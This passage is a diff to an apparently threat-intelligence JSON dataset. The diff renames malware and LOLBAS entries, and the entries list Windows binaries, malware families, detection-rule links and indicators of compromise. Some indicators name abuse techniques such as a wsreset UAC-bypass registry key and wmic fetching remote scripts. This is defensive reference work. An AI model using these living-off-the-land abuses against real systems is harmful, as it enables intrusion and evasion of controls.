[https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology](https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology)\n* [https://www.youtube.com/watch?v=3gz1QmiMhss](https://www.youtube.com/watch?v=3gz1QmiMhss)\n* [https://github.com/enigma0x3/windows-operating-system-archaeology](https://github.com/enigma0x3/windows-operating-system-archaeology)\n* [https://redcanary.com/blog/lateral-movement-winrm-wmi/](https://redcanary.com/blog/lateral-movement-winrm-wmi/)\n* [https://twitter.com/bohops/status/994405551751815170](https://twitter.com/bohops/status/994405551751815170)\n* [https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404](https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404)\n* [https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf)\n\n**Detection:**\n* Sigma: [proc_creation_win_winrm_awl_bypass.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_awl_bypass.yml)\n* Sigma: [proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml)\n* Sigma: [file_event_win_winrm_awl_bypass.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[winrm.vbs - LOLBAS Project](/references/86107810-8a1d-4c13-80f0-c1624143d057)]", @@ -33852,7 +33852,7 @@ } ], "uuid": "5f6ec10f-8c3d-4656-89bc-f349fe8e5149", - "value": "Winword.exe" + "value": "Winword.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Office binary\n\n**Author:** Reegun J (OCBC Bank)\n\n**Paths:**\n* C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\winword.exe\n* C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office16\\winword.exe\n* C:\\Program Files\\Microsoft Office\\Office16\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\winword.exe\n* C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office15\\winword.exe\n* C:\\Program Files\\Microsoft Office\\Office15\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\winword.exe\n* C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office14\\winword.exe\n* C:\\Program Files\\Microsoft Office\\Office14\\winword.exe\n* C:\\Program Files (x86)\\Microsoft Office\\Office12\\winword.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\winword.exe\n* C:\\Program Files\\Microsoft Office\\Office12\\winword.exe\n\n**Resources:**\n* [https://twitter.com/reegun21/status/1150032506504151040](https://twitter.com/reegun21/status/1150032506504151040)\n* [https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191](https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191)\n\n**Detection:**\n* Sigma: [proc_creation_win_office_arbitrary_cli_download.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml)\n* IOC: Suspicious Office application Internet/network traffic[[Winword.exe - LOLBAS Project](/references/6d75b154-a51d-4541-8353-22ee1d12ebed)]", @@ -33945,7 +33945,7 @@ } ], "uuid": "bb8be8ef-1d72-4e76-a111-4ddd0c4aa9d6", - "value": "Wlrmdr.exe" + "value": "Wlrmdr.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Logon Reminder executable\n\n**Author:** Moshe Kaplan\n\n**Paths:**\n* c:\\windows\\system32\\wlrmdr.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1493963591745220608](https://twitter.com/0gtweet/status/1493963591745220608)\n* [https://twitter.com/Oddvarmoe/status/927437787242090496](https://twitter.com/Oddvarmoe/status/927437787242090496)\n* [https://twitter.com/falsneg/status/1461625526640992260](https://twitter.com/falsneg/status/1461625526640992260)\n* [https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw](https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_wlrmdr.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml)\n* IOC: wlrmdr.exe spawning any new processes[[Wlrmdr.exe - LOLBAS Project](/references/43bebdc3-3072-4a3d-a0b7-0b23f1119136)]", @@ -33988,7 +33988,7 @@ } ], "uuid": "e7d40056-45fd-4e73-a7f4-750253b18d30", - "value": "Wmic.exe" + "value": "Wmic.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** The WMI command-line (WMIC) utility provides a command-line interface for WMI\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\wbem\\wmic.exe\n* C:\\Windows\\SysWOW64\\wbem\\wmic.exe\n\n**Resources:**\n* [https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory](https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory)\n* [https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html](https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html)\n* [https://twitter.com/subTee/status/986234811944648707](https://twitter.com/subTee/status/986234811944648707)\n\n**Detection:**\n* Sigma: [image_load_wmic_remote_xsl_scripting_dlls.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml)\n* Sigma: [proc_creation_win_wmic_xsl_script_processing.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml)\n* Sigma: [proc_creation_win_wmic_squiblytwo_bypass.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml)\n* Sigma: [proc_creation_win_wmic_eventconsumer_creation.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml)\n* Elastic: [defense_evasion_suspicious_wmi_script.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml)\n* Elastic: [persistence_via_windows_management_instrumentation_event_subscription.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Splunk: [xsl_script_execution_with_wmic.yml](https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml)\n* Splunk: [remote_wmi_command_attempt.yml](https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml)\n* Splunk: [remote_process_instantiation_via_wmi.yml](https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml)\n* Splunk: [process_execution_via_wmi.yml](https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Wmic retrieving scripts from remote system/Internet location\n* IOC: DotNet CLR libraries loaded into wmic.exe\n* IOC: DotNet CLR Usage Log - wmic.exe.log[[LOLBAS Wmic](/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]", @@ -34078,7 +34078,7 @@ } ], "uuid": "29f24b94-b871-4306-b75b-0a4b01860d0c", - "value": "WorkFolders.exe" + "value": "WorkFolders.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Work Folders\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\WorkFolders.exe\n\n**Resources:**\n* [https://www.ctus.io/2021/04/12/exploading/](https://www.ctus.io/2021/04/12/exploading/)\n* [https://twitter.com/ElliotKillick/status/1449812843772227588](https://twitter.com/ElliotKillick/status/1449812843772227588)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_workfolders.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml)\n* IOC: WorkFolders.exe should not be run on a normal workstation[[WorkFolders.exe - LOLBAS Project](/references/42cfa3eb-7a8c-482e-b8d8-78ae5c30b843)]", @@ -34121,7 +34121,7 @@ } ], "uuid": "eb4ba697-857a-4e23-9eff-f3aacdaaaa46", - "value": "Wscript.exe" + "value": "Wscript.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to execute scripts\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\wscript.exe\n* C:\\Windows\\SysWOW64\\wscript.exe\n\n**Resources:**\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n**Detection:**\n* Sigma: [proc_creation_win_wscript_cscript_script_exec.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml)\n* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)\n* Sigma: [image_load_susp_script_dotnet_clr_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml)\n* Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml)\n* Elastic: [command_and_control_remote_file_copy_scripts.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Splunk: [wscript_or_cscript_suspicious_child_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Wscript.exe executing code from alternate data streams\n* IOC: DotNet CLR libraries loaded into wscript.exe\n* IOC: DotNet CLR Usage Log - wscript.exe.log[[Wscript.exe - LOLBAS Project](/references/6c536675-84dd-44c3-8771-70120b413db7)]", @@ -34172,7 +34172,7 @@ } ], "uuid": "b7b8a330-d1f6-48f6-b49a-cbe7a786d1a3", - "value": "Wsl.exe" + "value": "Wsl.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows subsystem for Linux executable\n\n**Author:** Matthew Brown\n\n**Paths:**\n* C:\\Windows\\System32\\wsl.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* [https://twitter.com/nas_bench/status/1535431474429808642](https://twitter.com/nas_bench/status/1535431474429808642)\n\n**Detection:**\n* Sigma: [proc_creation_win_wsl_lolbin_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Child process from wsl.exe[[Wsl.exe - LOLBAS Project](/references/c147902a-e8e4-449f-8106-9e268d5367d8)]", @@ -34215,7 +34215,7 @@ } ], "uuid": "1736ed77-6f0e-4e70-89b1-8e41a005aae3", - "value": "Wsreset.exe" + "value": "Wsreset.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to reset Windows Store settings according to its manifest file\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\wsreset.exe\n\n**Resources:**\n* [https://www.activecyber.us/activelabs/windows-uac-bypass](https://www.activecyber.us/activelabs/windows-uac-bypass)\n* [https://twitter.com/ihack4falafel/status/1106644790114947073](https://twitter.com/ihack4falafel/status/1106644790114947073)\n* [https://github.com/hfiref0x/UACME/blob/master/README.md](https://github.com/hfiref0x/UACME/blob/master/README.md)\n\n**Detection:**\n* Sigma: [proc_creation_win_uac_bypass_wsreset_integrity_level.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml)\n* Sigma: [proc_creation_win_uac_bypass_wsreset.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml)\n* Sigma: [registry_event_bypass_via_wsreset.yml#](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml#)\n* Splunk: [wsreset_uac_bypass.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml)\n* IOC: wsreset.exe launching child process other than mmc.exe\n* IOC: Creation or modification of the registry value HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\n* IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen[[Wsreset.exe - LOLBAS Project](/references/24b73a27-f2ec-4cfa-a9df-59d4d4c1dd89)]", @@ -34258,7 +34258,7 @@ } ], "uuid": "11184347-6e49-4c9c-b730-636f2db7bdf6", - "value": "wt.exe" + "value": "wt.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Terminal\n\n**Author:** Nasreddine Bencherchali\n\n**Paths:**\n* C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_\\wt.exe\n\n**Resources:**\n* [https://twitter.com/nas_bench/status/1552100271668469761](https://twitter.com/nas_bench/status/1552100271668469761)\n\n**Detection:**\n* Sigma: [proc_creation_win_windows_terminal_susp_children.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml)[[wt.exe - LOLBAS Project](/references/bbdd85b0-fdbb-4bd2-b962-a915c23c83c2)]", @@ -34300,7 +34300,7 @@ } ], "uuid": "1fa5cc14-037c-4940-9816-76e009769429", - "value": "wuauclt.exe" + "value": "wuauclt.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Update Client\n\n**Author:** David Middlehurst\n\n**Paths:**\n* C:\\Windows\\System32\\wuauclt.exe\n\n**Resources:**\n* [https://dtm.uk/wuauclt/](https://dtm.uk/wuauclt/)\n\n**Detection:**\n* Sigma: [net_connection_win_wuauclt_network_connection.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml)\n* Sigma: [proc_creation_win_lolbin_wuauclt.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml)\n* Sigma: [proc_creation_win_wuauclt_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wuauclt_execution.yml)\n* IOC: wuauclt run with a parameter of a DLL path\n* IOC: Suspicious wuauclt Internet/network connections[[wuauclt.exe - LOLBAS Project](/references/09229ea3-ffd8-4d97-9728-f8c683ef6f26)]", @@ -34345,7 +34345,7 @@ } ], "uuid": "469e0e63-774e-4627-8e71-d4b206958acf", - "value": "OSX.Sofacy" + "value": "OSX.Sofacy - Associated Software" }, { "description": "[XAgentOSX](https://app.tidalcyber.com/software/6f411b69-6643-4cc7-9cbd-e15d9219e99c) is a trojan that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) on OS X and appears to be a port of their standard [CHOPSTICK](https://app.tidalcyber.com/software/01c6c49a-f7c8-44cd-a377-4dfd358ffeba) or XAgent trojan. [[XAgentOSX 2017](https://app.tidalcyber.com/references/2dc7a8f1-ccee-46f0-a995-268694f11b02)]", @@ -34491,7 +34491,7 @@ } ], "uuid": "66b2ced3-eab8-4586-91e0-5eedf642953f", - "value": "OSX.DubRobber" + "value": "OSX.DubRobber - Associated Software" }, { "description": "[XCSSET](https://app.tidalcyber.com/software/3672ecfa-20bf-4d69-948d-876be343563f) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://app.tidalcyber.com/software/3672ecfa-20bf-4d69-948d-876be343563f) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.[[trendmicro xcsset xcode project 2020](https://app.tidalcyber.com/references/0194bb11-8b97-4d61-8ddb-824077edc7db)]", @@ -34571,7 +34571,7 @@ } ], "uuid": "0baa74ce-ec67-49f5-a3b7-a83e99dd5753", - "value": "xpack.exe" + "value": "xpack.exe - Associated Software" }, { "description": "According to joint Cybersecurity Advisory AA23-250A (September 2023), Xpack is a malicious, \"custom .NET loader that decrypts (AES), loads, and executes accompanying files\".[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]", @@ -34611,7 +34611,7 @@ } ], "uuid": "c2269965-aafe-45b9-9852-4c80af005bfa", - "value": "Trojan.Shunnael" + "value": "Trojan.Shunnael - Associated Software" }, { "description": "[[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)][[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]", @@ -34625,7 +34625,7 @@ } ], "uuid": "c7a0f216-1bae-4ef7-b37e-5d6df89c8997", - "value": "X-Tunnel" + "value": "X-Tunnel - Associated Software" }, { "description": "[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]", @@ -34639,7 +34639,7 @@ } ], "uuid": "22ca51f0-cded-4fd9-99c1-5bd55f57bc56", - "value": "XAPS" + "value": "XAPS - Associated Software" }, { "description": "[XTunnel](https://app.tidalcyber.com/software/133136f0-7254-4cec-8710-0ab99d5da4e5) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) during the compromise of the Democratic National Committee. [[Crowdstrike DNC June 2016](https://app.tidalcyber.com/references/7f4edc06-ac67-4d71-b39c-5df9ce521bbb)] [[Invincea XTunnel](https://app.tidalcyber.com/references/43773784-92b8-4722-806c-4b1fc4278bb0)] [[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]", @@ -34692,7 +34692,7 @@ } ], "uuid": "3305e7bb-d304-4bf6-ad90-70aac0dd564c", - "value": "Xwizard.exe" + "value": "Xwizard.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Execute custom class that has been added to the registry or download a file with Xwizard.exe\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\xwizard.exe\n* C:\\Windows\\SysWOW64\\xwizard.exe\n\n**Resources:**\n* [http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/](http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/)\n* [https://www.youtube.com/watch?v=LwDHX7DVHWU](https://www.youtube.com/watch?v=LwDHX7DVHWU)\n* [https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5](https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5)\n* [https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/](https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/)\n* [https://twitter.com/notwhickey/status/1306023056847110144](https://twitter.com/notwhickey/status/1306023056847110144)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_class_exec_xwizard.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml)\n* Sigma: [proc_creation_win_lolbin_dll_sideload_xwizard.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml)\n* Elastic: [execution_com_object_xwizard.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)[[Xwizard.exe - LOLBAS Project](/references/573df5d1-83e7-4437-bdad-604f093b3cfd)]", @@ -34785,7 +34785,7 @@ } ], "uuid": "46252b99-2f81-4f99-9896-32fa41445351", - "value": "Zekapab" + "value": "Zekapab - Associated Software" }, { "description": "[Zebrocy](https://app.tidalcyber.com/software/e317b8a6-1722-4017-be33-717a5a93ef1c) is a Trojan that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. [[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)][[Unit42 Cannon Nov 2018](https://app.tidalcyber.com/references/8c634bbc-4878-4b27-aa18-5996ec968809)][[Unit42 Sofacy Dec 2018](https://app.tidalcyber.com/references/540c4c33-d4c2-4324-94cd-f57646666e32)][[CISA Zebrocy Oct 2020](https://app.tidalcyber.com/references/b7518c4d-6c10-43d2-8e57-d354fb8d4a99)] ", @@ -34903,7 +34903,7 @@ } ], "uuid": "f50a78e0-2256-4642-b267-ecf746252c5a", - "value": "Zipfldr.dll" + "value": "Zipfldr.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Compressed Folder library\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\zipfldr.dll\n* c:\\windows\\syswow64\\zipfldr.dll\n\n**Resources:**\n* [https://twitter.com/moriarty_meng/status/977848311603380224](https://twitter.com/moriarty_meng/status/977848311603380224)\n* [https://twitter.com/bohops/status/997896811904929792](https://twitter.com/bohops/status/997896811904929792)\n* [https://windows10dll.nirsoft.net/zipfldr_dll.html](https://windows10dll.nirsoft.net/zipfldr_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Zipfldr.dll - LOLBAS Project](/references/3bee0640-ea48-4164-be57-ac565d8cbea7)]", @@ -34965,7 +34965,7 @@ } ], "uuid": "3835527c-d5ce-43cc-92a6-2afee915dea6", - "value": "ZoxPNG" + "value": "ZoxPNG - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -34979,7 +34979,7 @@ } ], "uuid": "7835d0eb-283d-409e-827f-89579dddb21c", - "value": "Gresim" + "value": "Gresim - Associated Software" }, { "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -34993,7 +34993,7 @@ } ], "uuid": "df7b9419-47dc-4a77-bad0-3892fe251260", - "value": "ZoxRPC" + "value": "ZoxRPC - Associated Software" }, { "description": "[Zox](https://app.tidalcyber.com/software/75dd9acb-fcff-4b0b-b45b-f943fb589d78) is a remote access tool that has been used by [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) since at least 2008.[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", @@ -35068,7 +35068,7 @@ } ], "uuid": "9be660db-2271-4eed-9e9e-736b2a425a44", - "value": "Sensocode" + "value": "Sensocode - Associated Software" }, { "description": "[ZxShell](https://app.tidalcyber.com/software/eea89ff2-036d-4fa6-bbed-f89502c62318) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker 